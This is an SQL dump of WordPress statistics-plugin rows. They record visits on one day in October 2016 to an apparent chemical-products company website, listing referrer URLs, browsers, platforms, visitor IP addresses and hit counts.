INSERT INTO `wp_statistics_visitor` VALUES (9597, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9598, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9599, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.232.55.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9600, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.193.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9601, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.65.51.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9602, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Macintosh', '49.0', '', '74.129.131.147', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9603, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.173.191.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9604, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjzhd2x3evPAhUIsFQKHbJIDwEQjBAIJDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '11.0', '', '70.168.8.60', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9605, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.221.122.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9606, '2016-10-21', 'https://www.google.no/', 'Safari', 'iPhone', '9.0', '', '2.150.59.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9607, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.115.61.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9608, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.194.243.147', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9609, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.105.177.198', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9610, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9611, '2016-10-21', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9612, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.100.88.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9613, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.250.195.208', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9614, '2016-10-21', 'https://x-musics.com/', 'MSIE', 'Unknown', '6.0', '', '46.118.118.216', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9615, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '184.168.224.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9616, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.47.149.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9617, '2016-10-21', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.251.26.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9618, '2016-10-21', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwiGxdDZ5-vPAhUCWT4KHQoJAlwQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '10.0', '', '200.174.129.132', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9619, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '10.32.66.245', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9620, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '10.32.40.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9621, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.23.69.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9622, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '74.5.223.193', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9623, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '198.125.228.127', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9624, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9625, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.35.22.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9626, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.165.142.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9627, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.18.174.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9628, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.113.245.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9629, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.104.143.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9630, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.38.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9631, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9632, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '193.8.40.126', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9633, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9634, '2016-10-21', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '193.54.90.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9635, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.77.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9636, '2016-10-21', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '122.172.54.78', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9637, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '61.6.3.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9638, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 175, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9639, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.100.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9640, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwirmaXa7-vPAhVERSYKHURNBMAQFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fsolvsys%2F&usg=AFQjCNHwnwv-phXOZtryGtezeF2J4a2-ow', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9641, '2016-10-21', 'https://www.google.lv/', 'Chrome', 'Windows', '54.0.2840.59', '', '84.237.213.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9642, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.251.28.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9643, '2016-10-21', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '77.107.108.58', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9644, '2016-10-21', 'https://www.google.dk/', 'Chrome', 'Windows', '53.0.2785.143', '', '93.93.72.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9645, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.1.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9646, '2016-10-21', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '199.46.249.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9647, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.127.95.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9648, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.202.182.54', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9649, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9650, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9651, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.145.64.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9652, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.32.120.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9653, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.149.236.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9654, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.159.16.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9655, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.39.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9656, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.184.88.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9657, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '158.116.144.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9658, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '206.127.172.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9659, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjoh87O_evPAhUGJiYKHYaDA8wQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '4.16.99.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9660, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '172.56.4.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9661, '2016-10-21', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '46.18.221.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9662, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.193.108.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9663, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.218.55.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9664, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjq8Izv_-vPAhXNJYEKHcPfDAsYABAA&sig=AOD64_09aTYSsZE3K4zOeMvrUlVfcn5fUQ&rct=j&q=&ved=0ahUKEwiKvYnv_-vPAhURySYKHR--BvEQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '208.125.165.138', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9665, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.67.177.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9666, '2016-10-21', 'https://www.google.com.br/', 'Chrome', 'Windows', '53.0.2785.143', '', '200.174.129.132', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9667, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.245.174.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9668, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9669, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.124.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9670, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '195.154.240.176', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9671, '2016-10-21', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9672, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjGp423guzPAhWMJiYKHVMXCaAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9673, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.154.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9674, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=5&ved=0ahUKEwiz-8jS_evPAhVINSYKHVA4AbEQFgg5MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA', 'MSIE', 'Windows', '7.0', '', '199.89.130.52', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9675, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '199.89.130.52', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9676, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9677, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9678, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.78.189.150', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9679, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwibqpyshOzPAhWFTSYKHZpQBawQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct-tag%2Fms-250%2F&usg=AFQjCNHvYkIiiDMpwaZ9CumQxTo3vtqrrw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.70.106.162', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9680, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.80.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9681, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.189.194.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9682, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.67.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9683, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.13.86.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9684, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '12.0', '', '72.13.86.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9685, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '12.0', '', '72.13.86.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9686, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.13.86.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9687, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.246.45.146', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9688, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.207.3.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9689, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiwnfmmhuzPAhVIeD4KHabyAlMQFghfMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-106%2F&usg=AFQjCNGi2G0BlzPcbrzLTCvZe0hB531TXQ', 'MSIE', 'Windows', '11.0', '', '157.204.1.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9690, '2016-10-21', 'https://iqbazar.ru/', 'Opera', 'Windows', '9.00', '', '37.115.187.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9691, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.133.114.59', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9692, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.224.97.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9693, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.120.151.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9694, '2016-10-21', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '78.164.134.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9695, '2016-10-21', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9696, '2016-10-21', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9697, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.20.96.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9698, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.234.22.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9699, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9700, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '168.244.10.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9701, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.64.172.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9702, '2016-10-21', 'https://www.google.com/', 'Safari', 'iPad', '600.1.4', '', '71.222.149.200', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9703, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.95.166.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9704, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.129.110.182', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9705, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.18.139.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9706, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.148.174.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9707, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '10.3.58.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9708, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '193.201.224.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9709, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '193.201.224.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9710, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '75.88.235.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9711, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.177.39.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9712, '2016-10-21', 'https://www.google.hu/', 'Firefox', 'Windows', '49.0', '', '46.107.126.191', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9713, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.245.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9714, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.177.6.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9715, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Android', '53.0.2785.124', '', '24.114.57.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9716, '2016-10-21', 'https://www.miller-stephenson.com/', '501', 'Unknown', 'Unknown', '', '198.27.120.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9717, '2016-10-21', 'https://www.miller-stephenson.com/', '311', 'Unknown', 'Unknown', '', '198.27.120.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9718, '2016-10-21', 'https://www.miller-stephenson.com', 'PM', 'Unknown', '3.3.5', '', '64.114.13.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9719, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9720, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9721, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9722, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.191.56.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9723, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.23.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9724, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.180.121.79', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9725, '2016-10-21', 'https://www.google.ca/', 'Edge', 'Windows', '13.10586', '', '23.29.213.12', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9726, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.131.218.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9727, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.65.112.252', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9728, '2016-10-21', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '207.87.225.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9729, '2016-10-21', 'https://www.google.com/', 'Chrome', 'iPhone', '53.0.2785.109', '', '173.172.109.63', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9730, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.95.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9731, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '72.167.190.203', '000', 39, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9732, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.90.225.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9733, '2016-10-21', 'https://www.bing.com/search?q=m%2Fs+quick-freeze+sds&src=ie9tr', 'MSIE', 'Windows', '9.0', '', '10.97.65.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9734, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjFmJHSnOzPAhXTPIEKHWGkAigYABAK&sig=AOD64_3kIX9stGyHpshmk3RHFMVcGT6dhw&rct=j&q=&ved=0ahUKEwjumI3SnOzPAhWDbiYKHYv0AzIQ0QwIOQ&adurl=', 'MSIE', 'Windows', '11.0', '', '71.238.139.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9735, '2016-10-21', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.2.1', '', '52.43.49.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9736, '2016-10-21', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '52.43.49.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9737, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.208.86.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9738, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjwyqq-m-zPAhVJTX4KHXVkAgYYABAF&sig=AOD64_3rh2Qfc5A5H84hPdrYO5Ncq01Pkw&rct=j&q=&ved=0ahUKEwjbq5m-m-zPAhUd0IMKHexSAC8Q0QwIZw&adurl=', 'MSIE', 'Windows', '11.0', '', '70.168.181.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9739, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '65.36.68.100', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9740, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.89.36.44', '000', 3, 0); 
